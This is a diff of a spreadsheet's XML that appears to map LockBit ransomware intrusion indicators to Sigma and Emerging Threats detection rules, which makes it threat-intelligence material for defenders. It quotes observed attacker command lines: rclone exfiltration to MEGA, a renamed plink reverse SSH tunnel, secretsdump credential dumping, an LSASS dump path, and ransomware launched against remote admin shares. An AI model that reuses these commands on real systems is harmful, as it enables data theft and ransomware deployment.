+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimikatz.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0041"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimilib.dll&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0042"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimilove.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0043"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimispool.dll&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0044"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\LBB.exe&quot;}"/>
+    <s v="Lockbit binary"/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0045"/>
+    <s v="rclone-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;rclone --config=rclone.conf copy c:\&lt;directory&gt; mega:FTP&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0046"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;rclone/v1.64.2&quot;, &quot;http_host&quot;: &quot;&lt;random&gt;.userstorage.mega.co.nz&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0047"/>
+    <s v="anydesk-pid, pdq-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\pdq.exe&quot;, &quot;initiating_file_name&quot;: &quot;AnyDeskMSI.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0048"/>
+    <s v="anydesk-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\LBB.exe&quot;, &quot;initiating_file_name&quot;: &quot;AnyDeskMSI.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0049"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;cmd.exe /s / asd.bat&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0050"/>
+    <s v="cmd-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;start cmd /k \&quot;C:\temp\LBB.exe -path \&quot;\\&lt;host&gt;\C$&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0051"/>
+    <m/>
+    <s v="etpro"/>
+    <s v="ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1_x000a_ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers_x000a_ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1_x000a_ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)_x000a_ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl_x000a_ET HUNTING PE EXE Download over raw TCP_x000a_ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1_x000a_ET INFO Dotted Quad Host HTA Request_x000a_ET INFO User-Agent (python-requests) Inbound to Webserver_x000a_ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)_x000a_ET POLICY Possible HTA Application Download_x000a_ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199_x000a_ET WEB_CLIENT PowerShell call in script 1_x000a_ET WEB_CLIENT PowerShell call in script 2_x000a_ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body_x000a_ET WEB_SERVER WebShell Generic - net user_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2_x000a_ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1_x000a_ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)_x000a_ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports_x000a_ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP_x000a_ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0052"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installer"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0053"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="e32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0054"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="7d9263bd-dc47-4a58-bc92-5474abab390c    :       Change Winevt Channel Access Permission Via Registry"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0055"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="2f78da12-f7c7-430b-8b19-a28f269b77a3    :       Disable Windows Event Logging Via Registry"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0056"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="fcddca7c-b9c0-4ddf-98da-e1e2d18b0157    :       Disabled Windows Defender Eventlog"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0057"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="61065c72-5d7d-44ef-bf41-6a36684b545f    :       Elevated System Shell Spawned"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0058"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="98767d61-b2e8-4d71-b661-e36783ee24c1    :       Gzip Archive Decode Via PowerShell"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0059"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="a642964e-bead-4bed-8910-1bb4d63e3b4d    :       HackTool - Mimikatz Execution"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0060"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="502b42de-4306-40b4-9596-6f590c81f073    :       Local Accounts Discovery"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0061"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="f26c6093-6f14-4b12-800f-0fcb46f5ffd0    :       Malicious Base64 Encoded PowerShell Keywords in Command Lines"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0062"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="183e7ea8-ac4b-4c23-9aec-b3dac4e401ac    :       Net.EXE Execution"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0063"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="cd219ff3-fa99-45d4-8380-a7d15116c6dc    :       New User Created Via Net.EXE"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0064"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="f4bbd493-b796-416e-bbf2-121235348529    :       Non Interactive PowerShell Process Spawned"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0065"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="d679950c-abb7-43a6-80fb-2a480c4fc450    :       PDQ Deploy Remote Adminstartion Tool Execution"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0066"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="d7bcd677-645d-4691-a8d4-7a5602b780d1    :       Potential PowerShell Command Line Obfuscation"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0067"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="8e0bb260-d4b2-4fff-bb8d-3f82118e6892    :       Potentially Suspicious CMD Shell Output Redirect"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0068"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c    :       PowerShell Base64 Encoded FromBase64String Cmdlet"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0069"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="3b6ab547-8ec2-4991-b9d2-2b06702a48d7    :       PowerShell Download Pattern"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0070"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="6e897651-f157-4d8f-aaeb-df8151488385    :       PowerShell Web Download"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0071"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="86085955-ea48-42a2-9dd3-85d4c36b167d    :       Process Terminated Via Taskkill"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0072"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="b52e84a3-029e-4529-b09b-71d19dd27e94    :       Remote Access Tool - AnyDesk Execution"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0073"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="b98d0db6-511d-45de-ad02-e82a98729620    :       Remotely Hosted HTA File Executed Via Mshta.EXE"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0074"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="2aa0a6b4-a865-495b-ab51-c28249537b75    :       Startup Folder File Write"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0075"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="88872991-7445-4a22-90b2-a3adadb0e827    :       Stop Windows Service Via Net.EXE"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0076"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="590a5f4c-6c8c-4f10-8307-89afe9453a9d    :       Suspicious Child Process Created as System"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0077"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="7be5fb68-f9ef-476d-8b51-0256ebece19e    :       Suspicious Execution of Hostname"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0078"/>
+    <s v="pshell-pid"/>
+    <s v="sigma"/>
+    <s v="fb843269-508c-4b76-8b8d-88679db22ce7    :       Suspicious Execution of Powershell with Base64"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0079"/>
+    <s v="curl-pid"/>
+    <s v="sigma"/>
+    <s v="5cb299fc-5fb1-4d07-b989-0644c68b6043    :       Suspicious File Download From IP Via Curl.EXE"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0080"/>
+    <s v="pshell-pid"/>
+    <s v="sigma"/>
+    <s v="d75d6b6b-adb9-48f7-824b-ac2e786efe1f    :       Suspicious FromBase64String Usage On Gzip Archive - Process Creation"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0081"/>
+    <s v="mshta-pid"/>
+    <s v="sigma"/>
+    <s v="03cc0c25-389f-4bf8-b48d-11878079f1ca    :       Suspicious MSHTA Child Process"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0082"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="754ed792-634f-40ae-b3bc-e0448d33f695    :       Suspicious PowerShell Parent Process"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0083"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="2617e7ed-adb7-40ba-b0f3-8f9945fe6c09    :       Suspicious SYSTEM User Process Creation"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0084"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="63332011-f057-496c-ad8d-d2b6afb27f96    :       Suspicious Tasklist Discovery Command"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0085"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="ce72ef99-22f1-43d4-8695-419dcb5d9330    :       Suspicious Windows Service Tampering"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0086"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6    :       Unusually Long PowerShell CommandLine"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0087"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="e28a5a99-da44-436d-b7a0-2afc20a5f413    :       Whoami Utility Execution"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0088"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="8de1cbe8-d6f5-496d-8237-5f44a721c7a0    :       Whoami.EXE Execution Anomaly"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0089"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="79ce34ca-af29-4d0e-b832-fc1b377020db    :       Whoami.EXE Execution From Privileged Process"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0090"/>
+    <m/>
+    <s v="sigma"/>
+    <s v="671bb7e3-a020-4824-a00e-2ee5b55f385e    :       WMI Module Loaded By Uncommon Process"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0091"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="echo enter |c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 &lt;username&gt;@168.100.9[.]137 -pw &lt;password&gt;"/>
+    <s v="plink forwarding"/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0092"/>
+    <m/>
+    <s v="file_path"/>
+    <s v="c:\windows\servicehost.exe"/>
+    <s v="plink renamed"/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0093"/>
+    <m/>
+    <s v="htool"/>
+    <s v="screenconnect"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0094"/>
+    <m/>
+    <s v="htool"/>
+    <s v="splashtop"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0095"/>
+    <m/>
+    <s v="htool"/>
+    <s v="zoho assist"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0096"/>
+    <m/>
+    <s v="htool"/>
+    <s v="fixme it "/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0097"/>
+    <s v="anydesk-pid"/>
+    <s v="htool"/>
+    <s v="anydesk"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0098"/>
+    <m/>
+    <s v="htool"/>
+    <s v="atera"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0099"/>
+    <m/>
+    <s v="htool"/>
+    <s v="action1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0100"/>
+    <s v="psexec-pid"/>
+    <s v="htool"/>
+    <s v="psexec"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0101"/>
+    <m/>
+    <s v="htool"/>
+    <s v="adrecon"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0102"/>
+    <m/>
+    <s v="htool"/>
+    <s v="impacket"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0103"/>
+    <m/>
+    <s v="htool"/>
+    <s v="secretsdump.py"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0104"/>
+    <m/>
+    <s v="htool"/>
+    <s v="veeam-get-creds.ps1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0105"/>
+    <s v="procdump-pid"/>
+    <s v="htool"/>
+    <s v="procdump"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0106"/>
+    <s v="mimikatz-pid"/>
+    <s v="htool"/>
+    <s v="mimikatz"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0107"/>
+    <s v="lsass-pid"/>
+    <s v="file_path"/>
+    <s v="c:\perflogs\lsass.dmp "/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0108"/>
+    <m/>
+    <s v="file_path"/>
+    <s v="c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe "/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0109"/>
+    <m/>
+    <s v="file_path"/>
+    <s v="c:\perflogs\processhacker.exe"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0110"/>
+    <m/>
+    <s v="file_path"/>
+    <s v="c:\users\&lt;username&gt;\downloads\process hacker 2\peview.exe"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0111"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="secretsdump.py &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt; -outputfile 1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0112"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698618133[.]54 2&gt;&amp;1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0113"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0114"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /q /c query user 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0115"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0116"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /q /c cd 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0117"/>
+    <s v="netscan-pid"/>
+    <s v="htool"/>
+    <s v="SoftPerfect NetScan"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0118"/>
+    <m/>
+    <s v="file_name"/>
+    <s v="SRUtility.exe "/>
+    <s v="Splashtop"/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0119"/>
+    <s v="anydesk-pid"/>
+    <s v="file_name"/>
+    <s v="AnyDeskMSI.exe "/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0120"/>
+    <m/>
+    <s v="htool"/>
+    <s v="Plink"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0121"/>
+    <s v="teamvwr-pid"/>
+    <s v="htool"/>
+    <s v="Teamviewer"/>
+    <m/>
+    <x v="1"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0122"/>
+    <s v="pdq-pid"/>
+    <s v="htool"/>
+    <s v="%windir%\AdminArsenal\PDQDeployRunner\PDQDeployRunner\service-1\PDQDeployRunner-1.exe"/>
+    <s v="PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform the deployments."/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0123"/>
+    <s v="pdq-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;cmdline&quot;, &quot;initiating_process_path&quot;: &quot;c:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe&quot;, &quot;process_cmdline&quot;: &quot;cmd.exe /c /s asd.bat&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0124"/>
+    <s v="pdq-pid"/>
+    <s v="file_path"/>
+    <s v="c:\Program Files (x86)\Admin Arsenal\PDQ Deploy\PDQDeployService.exe"/>
+    <s v="PDQDeployService.exe is the background service that manages all schedules and deployments on the console."/>
+    <x v="0"/>
+  </r>
+</pivotCacheRecords>
+</file>
+
+<file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{BB20DCFF-9372-1242-90A5-B95E3A230EA9}" name="PivotTable5" cacheId="59" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+  <location ref="A3:C6" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
+  <pivotFields count="6">
+    <pivotField showAll="0"/>
+    <pivotField dataField="1" showAll="0"/>
+    <pivotField dataField="1" showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField axis="axisRow" showAll="0">
+      <items count="5">
+        <item x="1"/>
+        <item m="1" x="2"/>
+        <item m="1" x="3"/>
+        <item x="0"/>
+        <item t="default"/>
+      </items>
+    </pivotField>
+  </pivotFields>
+  <rowFields count="1">
+    <field x="5"/>
+  </rowFields>
+  <rowItems count="3">
+    <i>
+      <x/>
+    </i>
+    <i>
+      <x v="3"/>
+    </i>
+    <i t="grand">
+      <x/>
+    </i>
+  </rowItems>
+  <colFields count="1">
+    <field x="-2"/>
+  </colFields>
+  <colItems count="2">
+    <i>
+      <x/>
+    </i>
+    <i i="1">
+      <x v="1"/>
+    </i>
+  </colItems>
+  <dataFields count="2">
+    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
+    <dataField name="Count of eid_type" fld="2" subtotal="count" baseField="0" baseItem="0"/>
+  </dataFields>
+  <pivotTableStyleInfo name="PivotStyleLight16" showRowHeaders="1" showColHeaders="1" showRowStripes="0" showColStripes="0" showLastColumn="1"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{962EF5D1-5CA2-4c93-8EF4-DBF5C05439D2}">
+      <x14:pivotTableDefinition xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" hideValuesRow="1"/>
+    </ext>
+    <ext xmlns:xpdl="http://schemas.microsoft.com/office/spreadsheetml/2016/pivotdefaultlayout" uri="{747A6164-185A-40DC-8AA5-F01512510D54}">
+      <xpdl:pivotTableDefinition16/>
+    </ext>
+  </extLst>
+</pivotTableDefinition>
+</file>
+
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F149" totalsRowShown="0" dataDxfId="6">
-  <autoFilter ref="A1:F149" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F149">
-    <sortCondition ref="A1:A149"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F125" totalsRowShown="0" dataDxfId="6">
+  <autoFilter ref="A1:F125" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F125">
+    <sortCondition ref="A1:A125"/>
   </sortState>
   <tableColumns count="6">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
@@ -1481,18 +2471,82 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{15831F7E-D5A5-3A4E-9B01-AFDB66077813}">
+  <dimension ref="A3:C6"/>
+  <sheetViews>
+    <sheetView workbookViewId="0">
+      <selection activeCell="A11" sqref="A11"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
+  <cols>
+    <col min="1" max="1" width="164" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="15.33203125" bestFit="1" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A3" s="3" t="s">
+        <v>290</v>
+      </c>
+      <c r="B3" t="s">
+        <v>292</v>
+      </c>
+      <c r="C3" t="s">
+        <v>293</v>
+      </c>
+    </row>
+    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A4" s="4" t="s">
+        <v>220</v>
+      </c>
+      <c r="B4" s="5">
+        <v>8</v>
+      </c>
+      <c r="C4" s="5">
+        <v>31</v>
+      </c>
+    </row>
+    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A5" s="4" t="s">
+        <v>294</v>
+      </c>
+      <c r="B5" s="5">
+        <v>39</v>
+      </c>
+      <c r="C5" s="5">
+        <v>93</v>
+      </c>
+    </row>
+    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A6" s="4" t="s">
+        <v>291</v>
+      </c>
+      <c r="B6" s="5">
+        <v>47</v>
+      </c>
+      <c r="C6" s="5">
+        <v>124</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+</worksheet>
+</file>
+
